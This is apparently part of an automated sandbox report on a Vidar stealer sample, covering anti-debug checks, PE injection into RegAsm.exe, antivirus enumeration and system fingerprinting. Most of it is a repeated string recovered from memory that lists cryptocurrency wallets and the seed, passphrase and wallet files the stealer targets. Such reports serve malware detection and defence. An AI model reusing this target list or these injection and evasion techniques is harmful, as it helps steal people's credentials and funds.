Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F0665 mov eax, dword ptr fs:[00000030h]	0_2_004F0665
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F0612 mov eax, dword ptr fs:[00000030h]	0_2_004F0612
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F06D6 mov eax, dword ptr fs:[00000030h]	0_2_004F06D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F07C9 mov eax, dword ptr fs:[00000030h]	0_2_004F07C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F0873 mov eax, dword ptr fs:[00000030h]	0_2_004F0873
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F081E mov eax, dword ptr fs:[00000030h]	0_2_004F081E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F08B0 mov eax, dword ptr fs:[00000030h]	0_2_004F08B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004DD757 mov ecx, dword ptr fs:[00000030h]	0_2_004DD757

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0040D090 CopyFileA,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,memset,DeleteFileA,

1_2_0040D090

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004A8405 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004A8405
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0049726A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0049726A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00497616 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00497616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041AA5F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0041AA5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041FB38 SetUnhandledExceptionFilter,	1_2_0041FB38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041BF87 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0041BF87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C42C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_19C42C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C442AF SetUnhandledExceptionFilter,	1_2_19C442AF

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00411C50 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00411C50

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 424000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 643000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 644000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1138008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00496DE7 cpuid

0_2_00496DE7

Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_004E4E2A
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_004E5019
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoEx,	0_2_00495A6A
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_004E5B74
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoEx,FormatMessageA,	0_2_004724B7
Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_004F3037
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_004F3380
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_004F3402
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_004F34C3
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_004F3570
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_004F3857
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_004F39CA
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_004F3B11
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_004F3C13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_004103D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,LocalFree,	1_2_00410449
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	1_2_19C42112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	1_2_19C42112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	1_2_19E1FF17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	1_2_19C4298C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004E5BC2 GetSystemTimeAsFileTime,

0_2_004E5BC2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00410280 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_00410280

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00410360 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_00410360

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.000000000144A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron 